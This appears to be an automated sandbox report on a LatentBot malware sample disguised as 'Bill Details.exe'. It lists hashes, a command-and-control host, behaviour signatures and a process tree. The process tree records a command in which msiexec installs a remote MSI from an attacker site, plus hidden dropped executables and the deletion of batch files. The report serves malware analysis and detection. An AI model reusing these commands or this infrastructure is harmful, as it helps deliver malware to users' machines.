Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09/10/2024, 19:20
Static task
static1
Behavioral task
behavioral1
Sample
Bill Details.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Bill Details.exe
Resource
win10v2004-20241007-en
General
-
Target
Bill Details.exe
-
Size
3.9MB
-
MD5
f9fdaa73953ce9a148bc4b465ab1408f
-
SHA1
a2f259b8f8ddfae8994eb8200b8d89c256ddc13d
-
SHA256
0f6c99a0e331ab6eae07a1d98a80d839f8c2e025bd17a587a6c5eead001acc38
-
SHA512
889440392c11a0de283d6bf32ec4ba2c3e9aca463b7f96562815e1c2e06b1fe1f0a719896bfbb158ca7c1d557120fa73c82576f987ac76b28a0b8e598c111466
-
SSDEEP
98304:6tlEb9+zykLmOCYNW/WrHwOnvE8sJXcMv5ezs2rEPqtxLA:6tSb9+zykLmxd/cHwOkp7uA
Malware Config
Extracted
latentbot
besthard2024.zapto.org
Signatures
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2904 netsh.exe 2728 netsh.exe -
Executes dropped EXE 4 IoCs
pid Process 1160 MSIC922.tmp 1640 PrintDrivers.exe 780 PrintDriver.exe 1152 PrintDrivers.exe -
Loads dropped DLL 5 IoCs
pid Process 2236 MsiExec.exe 2096 MsiExec.exe 2096 MsiExec.exe 2096 MsiExec.exe 2788 cmd.exe -
Use of msiexec (install) with remote resource 1 IoCs
pid Process 2684 msiexec.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 12 2684 msiexec.exe 14 2684 msiexec.exe 16 2632 msiexec.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Q: Bill Details.exe File opened (read-only) \??\Z: Bill Details.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: Bill Details.exe File opened (read-only) \??\M: Bill Details.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\J: Bill Details.exe File opened (read-only) \??\P: Bill Details.exe File opened (read-only) \??\T: Bill Details.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\V: Bill Details.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\N: Bill Details.exe File opened (read-only) \??\X: Bill Details.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: Bill Details.exe File opened (read-only) \??\R: Bill Details.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: Bill Details.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: Bill Details.exe File opened (read-only) \??\S: Bill Details.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: Bill Details.exe File opened (read-only) \??\L: Bill Details.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: Bill Details.exe File opened (read-only) \??\Y: Bill Details.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: Bill Details.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: Bill Details.exe File opened (read-only) \??\U: Bill Details.exe File opened (read-only) \??\W: Bill Details.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSIC611.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC73B.tmp msiexec.exe File created C:\Windows\Installer\f76c785.ipi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIBB73.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC67F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC884.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC922.tmp msiexec.exe File opened for modification C:\Windows\Installer\f76c785.ipi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bill Details.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PrintDrivers.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSIC922.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PrintDrivers.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Delays execution with timeout.exe 10 IoCs
pid Process 1320 timeout.exe 1380 timeout.exe 2232 timeout.exe 2484 timeout.exe 2288 timeout.exe 2956 timeout.exe 1388 timeout.exe 2212 timeout.exe 1368 timeout.exe 1864 timeout.exe -
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Kills process with taskkill 3 IoCs
pid Process 2972 taskkill.exe 2076 taskkill.exe 2256 taskkill.exe -
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad msiexec.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 Bill Details.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Bill Details.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Bill Details.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Bill Details.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1152 PrintDrivers.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2632 msiexec.exe 2632 msiexec.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe 1640 PrintDrivers.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2632 msiexec.exe Token: SeTakeOwnershipPrivilege 2632 msiexec.exe Token: SeSecurityPrivilege 2632 msiexec.exe Token: SeCreateTokenPrivilege 2532 Bill Details.exe Token: SeAssignPrimaryTokenPrivilege 2532 Bill Details.exe Token: SeLockMemoryPrivilege 2532 Bill Details.exe Token: SeIncreaseQuotaPrivilege 2532 Bill Details.exe Token: SeMachineAccountPrivilege 2532 Bill Details.exe Token: SeTcbPrivilege 2532 Bill Details.exe Token: SeSecurityPrivilege 2532 Bill Details.exe Token: SeTakeOwnershipPrivilege 2532 Bill Details.exe Token: SeLoadDriverPrivilege 2532 Bill Details.exe Token: SeSystemProfilePrivilege 2532 Bill Details.exe Token: SeSystemtimePrivilege 2532 Bill Details.exe Token: SeProfSingleProcessPrivilege 2532 Bill Details.exe Token: SeIncBasePriorityPrivilege 2532 Bill Details.exe Token: SeCreatePagefilePrivilege 2532 Bill Details.exe Token: SeCreatePermanentPrivilege 2532 Bill Details.exe Token: SeBackupPrivilege 2532 Bill Details.exe Token: SeRestorePrivilege 2532 Bill Details.exe Token: SeShutdownPrivilege 2532 Bill Details.exe Token: SeDebugPrivilege 2532 Bill Details.exe Token: SeAuditPrivilege 2532 Bill Details.exe Token: SeSystemEnvironmentPrivilege 2532 Bill Details.exe Token: SeChangeNotifyPrivilege 2532 Bill Details.exe Token: SeRemoteShutdownPrivilege 2532 Bill Details.exe Token: SeUndockPrivilege 2532 Bill Details.exe Token: SeSyncAgentPrivilege 2532 Bill Details.exe Token: SeEnableDelegationPrivilege 2532 Bill Details.exe Token: SeManageVolumePrivilege 2532 Bill Details.exe Token: SeImpersonatePrivilege 2532 Bill Details.exe Token: SeCreateGlobalPrivilege 2532 Bill Details.exe Token: SeCreateTokenPrivilege 2532 Bill Details.exe Token: SeAssignPrimaryTokenPrivilege 2532 Bill Details.exe Token: SeLockMemoryPrivilege 2532 Bill Details.exe Token: SeIncreaseQuotaPrivilege 2532 Bill Details.exe Token: SeMachineAccountPrivilege 2532 Bill Details.exe Token: SeTcbPrivilege 2532 Bill Details.exe Token: SeSecurityPrivilege 2532 Bill Details.exe Token: SeTakeOwnershipPrivilege 2532 Bill Details.exe Token: SeLoadDriverPrivilege 2532 Bill Details.exe Token: SeSystemProfilePrivilege 2532 Bill Details.exe Token: SeSystemtimePrivilege 2532 Bill Details.exe Token: SeProfSingleProcessPrivilege 2532 Bill Details.exe Token: SeIncBasePriorityPrivilege 2532 Bill Details.exe Token: SeCreatePagefilePrivilege 2532 Bill Details.exe Token: SeCreatePermanentPrivilege 2532 Bill Details.exe Token: SeBackupPrivilege 2532 Bill Details.exe Token: SeRestorePrivilege 2532 Bill Details.exe Token: SeShutdownPrivilege 2532 Bill Details.exe Token: SeDebugPrivilege 2532 Bill Details.exe Token: SeAuditPrivilege 2532 Bill Details.exe Token: SeSystemEnvironmentPrivilege 2532 Bill Details.exe Token: SeChangeNotifyPrivilege 2532 Bill Details.exe Token: SeRemoteShutdownPrivilege 2532 Bill Details.exe Token: SeUndockPrivilege 2532 Bill Details.exe Token: SeSyncAgentPrivilege 2532 Bill Details.exe Token: SeEnableDelegationPrivilege 2532 Bill Details.exe Token: SeManageVolumePrivilege 2532 Bill Details.exe Token: SeImpersonatePrivilege 2532 Bill Details.exe Token: SeCreateGlobalPrivilege 2532 Bill Details.exe Token: SeCreateTokenPrivilege 2532 Bill Details.exe Token: SeAssignPrimaryTokenPrivilege 2532 Bill Details.exe Token: SeLockMemoryPrivilege 2532 Bill Details.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 2684 msiexec.exe 2684 msiexec.exe 780 PrintDriver.exe 780 PrintDriver.exe 780 PrintDriver.exe 780 PrintDriver.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 780 PrintDriver.exe 780 PrintDriver.exe 780 PrintDriver.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2632 wrote to memory of 2236 2632 msiexec.exe 32 PID 2632 wrote to memory of 2236 2632 msiexec.exe 32 PID 2632 wrote to memory of 2236 2632 msiexec.exe 32 PID 2632 wrote to memory of 2236 2632 msiexec.exe 32 PID 2632 wrote to memory of 2236 2632 msiexec.exe 32 PID 2632 wrote to memory of 2236 2632 msiexec.exe 32 PID 2632 wrote to memory of 2236 2632 msiexec.exe 32 PID 2532 wrote to memory of 2684 2532 Bill Details.exe 33 PID 2532 wrote to memory of 2684 2532 Bill Details.exe 33 PID 2532 wrote to memory of 2684 2532 Bill Details.exe 33 PID 2532 wrote to memory of 2684 2532 Bill Details.exe 33 PID 2532 wrote to memory of 2684 2532 Bill Details.exe 33 PID 2532 wrote to memory of 2684 2532 Bill Details.exe 33 PID 2532 wrote to memory of 2684 2532 Bill Details.exe 33 PID 2632 wrote to memory of 2096 2632 msiexec.exe 34 PID 2632 wrote to memory of 2096 2632 msiexec.exe 34 PID 2632 wrote to memory of 2096 2632 msiexec.exe 34 PID 2632 wrote to memory of 2096 2632 msiexec.exe 34 PID 2632 wrote to memory of 2096 2632 msiexec.exe 34 PID 2632 wrote to memory of 2096 2632 msiexec.exe 34 PID 2632 wrote to memory of 2096 2632 msiexec.exe 34 PID 2632 wrote to memory of 1160 2632 msiexec.exe 35 PID 2632 wrote to memory of 1160 2632 msiexec.exe 35 PID 2632 wrote to memory of 1160 2632 msiexec.exe 35 PID 2632 wrote to memory of 1160 2632 msiexec.exe 35 PID 2632 wrote to memory of 1160 2632 msiexec.exe 35 PID 2632 wrote to memory of 1160 2632 msiexec.exe 35 PID 2632 wrote to memory of 1160 2632 msiexec.exe 35 PID 2532 wrote to memory of 1076 2532 Bill Details.exe 37 PID 2532 wrote to memory of 1076 2532 Bill Details.exe 37 PID 2532 wrote to memory of 1076 2532 Bill Details.exe 37 PID 2532 wrote to memory of 1076 2532 Bill Details.exe 37 PID 1076 wrote to memory of 1772 1076 cmd.exe 40 PID 1076 wrote to memory of 1772 1076 cmd.exe 40 PID 1076 wrote to memory of 1772 1076 cmd.exe 40 PID 1076 wrote to memory of 1772 1076 cmd.exe 40 PID 900 wrote to memory of 2232 900 cmd.exe 42 PID 900 wrote to memory of 2232 900 cmd.exe 42 PID 900 wrote to memory of 2232 900 cmd.exe 42 PID 1076 wrote to memory of 2424 1076 cmd.exe 43 PID 1076 wrote to memory of 2424 1076 cmd.exe 43 PID 1076 wrote to memory of 2424 1076 cmd.exe 43 PID 1076 wrote to memory of 2424 1076 cmd.exe 43 PID 900 wrote to memory of 1548 900 cmd.exe 44 PID 900 wrote to memory of 1548 900 cmd.exe 44 PID 900 wrote to memory of 1548 900 cmd.exe 44 PID 1076 wrote to memory of 2304 1076 cmd.exe 45 PID 1076 wrote to memory of 2304 1076 cmd.exe 45 PID 1076 wrote to memory of 2304 1076 cmd.exe 45 PID 1076 wrote to memory of 2304 1076 cmd.exe 45 PID 1076 wrote to memory of 912 1076 cmd.exe 46 PID 1076 wrote to memory of 912 1076 cmd.exe 46 PID 1076 wrote to memory of 912 1076 cmd.exe 46 PID 1076 wrote to memory of 912 1076 cmd.exe 46 PID 900 wrote to memory of 2300 900 cmd.exe 47 PID 900 wrote to memory of 2300 900 cmd.exe 47 PID 900 wrote to memory of 2300 900 cmd.exe 47 PID 2300 wrote to memory of 1996 2300 cmd.exe 48 PID 2300 wrote to memory of 1996 2300 cmd.exe 48 PID 2300 wrote to memory of 1996 2300 cmd.exe 48 PID 900 wrote to memory of 2156 900 cmd.exe 49 PID 900 wrote to memory of 2156 900 cmd.exe 49 PID 900 wrote to memory of 2156 900 cmd.exe 49 PID 900 wrote to memory of 2072 900 cmd.exe 50 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1772 attrib.exe 2424 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Bill Details.exe"C:\Users\Admin\AppData\Local\Temp\Bill Details.exe"1⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i https://www.walteryhu.site/PrintViewer.msi AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Bill Details.exe" SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1728242176 "2⤵
- Use of msiexec (install) with remote resource
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2684
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EXEC9A4.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\AIEABEB.tmp"3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1772
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEC9A4.bat"3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEC9A4.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:2304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"3⤵
- System Location Discovery: System Language Discovery
PID:912
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 89C0DB15C756BA18A4C2A48C24AAA8D0 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2236
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A73C91170C73F98176F846D9C412719C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2096
-
-
C:\Windows\Installer\MSIC922.tmp"C:\Windows\Installer\MSIC922.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1160
-
-
C:\Games\PrintDrivers.exe"C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1640
-
C:\Windows\system32\cmd.execmd /c ""C:\Games\PrintDrivers.cmd" "1⤵
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Windows\system32\mode.comMode 90,202⤵PID:2232
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul2⤵PID:1548
-
-
